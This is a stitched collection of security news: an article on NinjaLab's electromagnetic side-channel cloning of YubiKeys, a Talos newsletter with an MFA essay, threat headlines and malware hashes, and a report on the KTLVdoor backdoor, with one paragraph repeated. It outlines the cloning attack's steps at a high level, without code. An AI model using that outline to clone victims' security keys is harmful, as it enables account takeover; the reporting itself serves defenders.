> In the Infineon cryptolibrary the modular inversion is not constant time: different ephemeral key will lead to different inversion execution time. When acquiring the electromagnetic radiation of a chip running this function one can extract tiny differences of execution times throughout the inversion computation. These small timing leakages allow us to extract the ephemeral key and then the secret key.

The attacks require about $11,000 worth of equipment and a sophisticated understanding of electrical and cryptographic engineering. The difficulty of the attack means it would likely be carried out only by nation-states or other entities with comparable resources, and then only in highly targeted scenarios. The likelihood of such an attack being used widely in the wild is extremely low. Roche said that two-factor-authentication and one-time password functionalities aren't affected: because they don't use the vulnerable part of the library.

Tuesday's report from NinjaLab outlines the full flow of the cloning attack as:

1.  The adversary steals the login and password of a victim’s application account protected with FIDO (e.g., via a phishing attack).
2.  The adversary gets physical access to the victim’s device during a limited time frame without the victim noticing.
3.  Thanks to the stolen victim’s login and password (for a given application account), the adversary sends the authentication request to the device as many times as is necessary while performing side-channel measurements.
4.  The adversary quietly gives back the FIDO device to the victim.
5.  The adversary performs a side-channel attack over the measurements and succeeds in extracting the ECDSA private key linked to the victim’s application account.
6.  The adversary can sign in to the victim’s application account without the FIDO device and without the victim noticing. In other words, the adversary created a clone of the FIDO device for the victim’s application account. This clone will give access to the application account as long as the legitimate user does not revoke its authentication credentials.

The list, however, omits a key step, which is tearing down the YubiKey and exposing the logic board housed inside. This likely would be done by using a hot air gun and a scalpel to remove the plastic key casing and expose the part of the logic board that acts as a secure element storing the cryptographic secrets. From there, the attacker would connect the chip to hardware and software that take measurements as the key is being used to authenticate an existing account. Once the measurement-taking is finished, the attacker would seal the chip in a new casing and return it to the victim.

Left: a YubiKey 5Ci intact; Right: the logic board found inside.

Courtesy of NinjaLab

Two images showing how the electromagnetic radiation is measured using a probe.

Courtesy of NinjaLab

The attack and underlying vulnerability that makes it possible are almost entirely the same as that allowed NinjaLab to clone Google Titan keys in 2021. That attack required physical access to the token for about 10 hours.

The attacks violate a fundamental guarantee of FIDO-compliant keys, which is that the secret cryptographic material they store can’t be read or copied by any other device. This assurance is crucial because FIDO keys are used in various security-critical environments, such as those in the military and corporate networks.

That said, FIDO-compliant authentication is among the most robust forms of authentication, one that’s not susceptible to credential phishing or adversary-in-the-middle attacks. As long as the key stays out of the hands of a highly skilled and well-equipped attacker, it remains among the strongest forms of authentication. It’s also worth noting that cloning the token is only one of two major steps required to gain unauthorized access to an account or device. An attacker also must obtain the user password used for the first factor of authentication. These requirements mean that physical keys remain among the most secure authentication methods.

To uncover the side channel, the researchers reverse engineered the Infineon cryptographic library, a heavily fortified collection of code that the manufacturer takes great pains to keep confidential. The detailed description of the library is likely to be of intense interest to cryptography researchers analyzing how it works in other security devices.

People who want to know what firmware version their YubiKey runs can use the Yubico Authenticator app. The upper-left corner of the home screen displays the series and model of the key. In the example below, from Tuesday’s advisory, the YubiKey is a YubiKey 5C NFC version 5.7.0.

YubiKeys provide optional user authentication protections, including the requirement for a user-supplied PIN code or a fingerprint or face scan. For the cloning attack to work against YubiKeys using these additional measures, an attacker would need to possess the user verification factor as well. More information about using these additional measures to lock down YubiKeys further is available here.

A key question that remains unanswered at the moment is what other security devices rely on the three vulnerable Infineon secure modules and use the Infineon cryptolibrary? Infineon has yet to issue an advisory and didn't respond to an email asking for one. At the moment, there is no known CVE for tracking the vulnerability.

_This story originally appeared on_ _Ars Technica._

YubiKeys Are a Security Gold Standard—but They Can Be Cloned

In my opinion, mandatory enrollment is best enrollment.

Thursday, September 5, 2024 14:00

As most quality thoughts go, my most recent musing on security came about because of fantasy football. 

I had to log into my Yahoo Sports account, which I admittedly only ever have to log in to, at most, three times a year for the one fantasy football draft I have on that platform each year and then the handful of other times my phone logs me out during the five months that I’m adjusting my lineups on a weekly basis.  

Admittedly, I’d never thought much about the security of my Yahoo Sports account because I don’t have any sensitive information tied to it, and if someone did want to break in, they could probably do a better job of managing my team in that league than I have the past few years. It’s the old “out of sight, out of mind” compared to something like my work email account where I’m logging in every morning, or online banking which I’m using several times a week, and the knowledge that my financial wellbeing is tied to those account credentials. 

But I have to give credit to Yahoo for how they handled my account being less secure. When I logged in, probably for the first time since January, this weekend, before it would even display my homepage or enter the fantasy draft, it took me to an account management page where it warned me that I was using a “less secure” password and still hadn’t enrolled in multi-factor authentication. It took me less than a minute to update my password to something more secure, and maybe another two minutes to enroll in passcode MFA. 

The account management page also had some helpful information, such as how long it had been since my last password change, offering the ability to manage my password through a third-party app, and multiple options to set up MFA, including using the Yahoo Sports app directly (this is always more appealing to me than having to download yet another MFA app on my phone). 

This also got me thinking about the ways in which I don’t like being asked or reminded to enroll in MFA. It never made any sense to me that sites would give users the option to click away from the screen when being asked to enroll in MFA — make it mandatory or don’t. Also, one of my biggest pet peeves in using the internet is when you confirm this is a personal device or “Remember Me” for the next time I log in and the site doesn’t, in fact, remember me, and I have to go through the same approval process multiple times in the same day. 

Our friends at Cisco Duo also have a few other great recommendations for getting people to enroll in MFA, but in my opinion, mandatory enrollment is best enrollment. If I had never displayed that screen on Yahoo’s login page, I wouldn’t have even thought twice about how secure my account was. And seeing a red “!” next to my password gave off an immediate sign that my password needed to be improved, which is something I wish other sites would start doing.  

It’s not like having my fantasy football login credentials compromised would be the end of the world, but when it comes to something more high stakes, there are a few small UI steps sites could take to help nudge us in the right direction. 

**The one big thing **

Threat actors are increasingly using a traditional Red Teaming tool called MacroPack to create new malware payloads. These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT). Several different actors are using this tactic based on files uploaded to VirusTotal that Talos analyzed. They are written in different languages and rely on different themes centered on different geographies, which leads us to believe these are disparate campaigns.  

**Why do I care? **

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malicious files Talos analyzed as part of this research. Our blog post also has an in-depth breakdown of the four major themes used across these malicious documents, information that could be crucial to informing potential targets about these threats.  

**Top security headlines of the week **

**A new report from Google’s Threat Analysis Group found that Russia’s APT29 is exploiting some of the same vulnerabilities as two popular spyware vendors.** The analysis comes from watering hole attacks that researchers saw in the wild between November 2023 and July 2024 targeting Mongolian government websites. APT29, largely thought to be connected to Russia’s government, exploited the same vulnerabilities in Apple iOS WebKit and Google Chrome that two spyware vendors, Intellexa and NSO Group, are also known to use. The actor (also known as Cozy Bear and Midnight Blizzard) compromised the government-controlled websites to embed malicious payloads in hidden iframes on web pages. These iframes pointed users to attacker-controlled websites, where the exploits were deployed to steal user data from iOS and Android devices. Intellexa, which Cisco Talos has reported on several times, was recently blacklisted by the U.S. government for its role in creating and distributing the Predator spyware. And the Israeli NSO Group is infamous for its Pegasus spyware, commonly used to target at-risk individuals like journalists, politicians and activists. (Google TAG, The Record) 

**A North Korean state-sponsored actor known as Citrine Sleet is actively exploiting a zero-day vulnerability in the Google Chrome web browser to steal users’ cryptocurrency.** Microsoft wrote in an advisory regarding the vulnerability, identified as CVE-2024-7971, that users had been "targeted and compromised" by the zero-day attack. Google has since released a patch for the issue. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow an attacker to execute remote code on the targeted machine. Citrine Sleet is believed to be based in North Korea and primarily targets financial institutions, especially those that manage cryptocurrency accounts. Its social engineering techniques focus on the cryptocurrency industry and individuals believed to be associated with it. Exploitation of the vulnerability started by tricking a victim into visiting an attacker-controlled website. Then, because of a different vulnerability in the Windows kernel, Citrine Sleet could install a rootkit on the target’s computer, essentially giving them complete control of the machine. Cryptocurrency has long been a target for North Korean state-sponsored actors, who often use the stolen currency to fund the country’s military operations. (TechCrunch, Decipher) 

**The FBI released a new warning this week that North Korean actors could soon launch a wave of cyber attacks targeting "organizations with access to large quantities of cryptocurrency-related assets or products.”** A public service announcement released Tuesday said that actors had been carrying out reconnaissance-related social engineering campaigns for months targeting individuals believed to be involved in the cryptocurrency industry, or employees of financial institutions who handle virtual currency. Most of the potential targets are found by the actors by monitoring their social media activity, particularly on professional networking or employment-related platforms. These actors also are impersonating legitimate employees, looking to gain remote employment at these companies using fake names, identities and profiles. “Given the scale and persistence of this malicious activity, even those well versed in cybersecurity practices can be vulnerable to North Korea's determination to compromise networks connected to cryptocurrency assets,” the PSA reads. (Dark Reading, FBI) 

**Can’t get enough Talos? **

*   Vulnerabilities in Microsoft apps for macOS allow stealing permissions 
*   BlackByte ransomware group targets VMware ESXi bug 
*   Cisco: BlackByte ransomware gang only posting 20% to 30% of successful attacks 
*   Bug Leaves Microsoft Apps for MacOS Open to Silent Takeovers 

**Upcoming events where you can find Talos **

**LABScon** **(Sept. 18 - 21)**  

_Scottsdale, Arizona_ 

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256**: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** PUA.Win.Dropper.Generic::1201 

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d   
**MD5:** fd743b55d530e0468805de0e83758fe9   
**Typical Filename:** KMSAuto Net.exe   
**Claimed Product:** KMSAuto Net   
**Detection Name:** W32.File.MalParent

The best and worst ways to get users to improve their account security

The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China.

The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems.

"KTLVdoor is a highly obfuscated malware that

The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China.

The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems.

"KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning," Trend Micro researchers Cedric Pernet and Jaromir Horejsi said in an analysis published Wednesday.

Some of the tools KTLVdoor impersonates include sshd, Java, SQLite, bash, and edr-agent, among others, with the malware distributed in the form of dynamic-link library (.dll) or a shared object (.so).

Perhaps the most unusual aspect of the activity cluster is the discovery of more than 50 command-and-control (C&C) servers, all hosted at Chinese company Alibaba, that have been identified as communicating with variants of the malware, raising the possibility that the infrastructure could be shared with other Chinese threat actors.

Earth Lusca is known to be active since at least 2021, orchestrating cyber attacks against public and private sector entities across Asia, Australia, Europe, and North America. It's assessed to share some tactical overlaps with other intrusion sets tracked as RedHotel and APT27 (aka Budworm, Emissary Panda, and Iron Tiger).

KTLVdoor, the latest addition to the group's malware arsenal, is highly obfuscated and gets its name from the use of a marker called "KTLV" in its configuration file that includes various parameters necessary to meet its functions, including the C&C servers to connect to.

Once initialized, the malware initiates contact with the C&C server on a loop, awaiting further instructions to be executed on the compromised host. The supported commands allow it to download/upload files, enumerate the file system, launch an interactive shell, run shellcode, and initiate scanning using ScanTCP, ScanRDP, DialTLS, ScanPing, and ScanWeb, among others.

That having said, not much is known about how the malware is distributed and if it has been used to target other entities across the world.

"This new tool is used by Earth Lusca, but it might also be shared with other Chinese-speaking threat actors," the researchers noted. "Seeing that all C&C servers were on IP addresses from China-based provider Alibaba, we wonder if the whole appearance of this new malware and the C&C server could not be some early stage of testing new tooling."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#java